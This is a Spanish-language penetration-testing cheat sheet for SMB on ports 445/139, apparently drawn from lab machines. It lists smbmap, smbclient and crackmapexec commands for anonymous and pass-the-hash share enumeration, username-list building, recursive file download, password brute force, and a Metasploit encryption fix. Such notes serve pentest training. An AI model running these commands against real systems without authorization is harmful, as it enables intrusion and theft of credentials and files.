SMB - (445-139)
Listado de carpetas
Comandos recomendables para listar carpetas con usuario anonymous, credenciales validas y utilizando la técnica de pass the hash.
$ smbmap -H 10.10.10.111
[+] Guest session IP: 10.11.1.231:445 Name: 10.11.1.231
Disk Permissions Comment
---- ----------- -------
home READ ONLY Home
docs READ ONLY docs
tmp READ ONLY TMP
IPC$ NO ACCESS IPC Service (Samba 4.2.10-Debian)
$ smbclient \\\\10.10.10.111\\home
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
$ smb: \> dir
. D 0 Sun Dec 27 23:20:35 2015
.. D 0 Sun Dec 27 23:09:11 2015
folder08 D 0 Fri Jan 2 06:13:55 2015
folder02 D 0 Fri Jan 2 07:44:26 2015
$ smbclient --no-pass -L //10.10.10.111
$ smbmap -u invalid -H 10.10.10.111
[+] Guest session IP: 10.10.10.111:445 Name: BLACKFIELD.local
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
forensic NO ACCESS Forensic / Audit share.
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
profiles$ READ ONLY
SYSVOL NO ACCESS Logon server share
smbclient -U invalid //10.10.10.111/profiles\$
smbmap -H 192.168.0.1 [-P <PORT>] #Null user
smbmap -u "username" -p "password" -H 192.168.0.1 [-P <PORT>] #Creds
smbmap -u "username" -p "<NT>:<LM>" -H 192.168.0.1 [-P <PORT>] #Pass-the-Hash
crackmapexec smb 192.168.0.1 -u '' -p '' --shares #Null user
crackmapexec smb 192.168.0.1 -u 'username' -p 'password' --shares #Guest user
crackmapexec smb 192.168.0.1 -u 'username' -H '<HASH>' --shares #Guest user
nmap -p445 --script smb-vuln-*
# Validar version del SMB
crackmapexec smb 10.10.10.111
# Crear Diccionario apartir de nombres de carpetas de smb
smbclient -U invalid%invalid //10.10.10.111/profiles\$ -c ls | awk '{print $1}' > users.txt
# Filtrado de extension de ficheros con busqueda recursiva
smbmap -u SABatchJobs -p SABatchJobs -d megabank -H 10.10.10.172 -A '(xlsx|docx|txt|xml)' -R
#Obtener version de SMB
/smbver.sh 10.10.10.111 139
10.10.10.111: UnixSamba 227a
Descarga recursiva de archivos y carpetas de SMB
smb: \> promp on
smb: \> recurse on
smb: \> mget *Fuerza bruta con usuario de contraseña
crackmapexec smb 10.10.10.111 -u users.txt -p users.txt --continue-on-successSolucionar Error con Metasploit
[-] 172.20.8.130:445 - Exploit failed: RubySMB::Error::EncryptionError Communication error with the remote host: Socket read returned nil. The server supports encryption but was not able to handle the encrypted request.
[*] Exploit completed, but no session was created.
## Solucion
set SMB::AlwaysEncrypt false
set SMB::ProtocolVersion 1Última actualización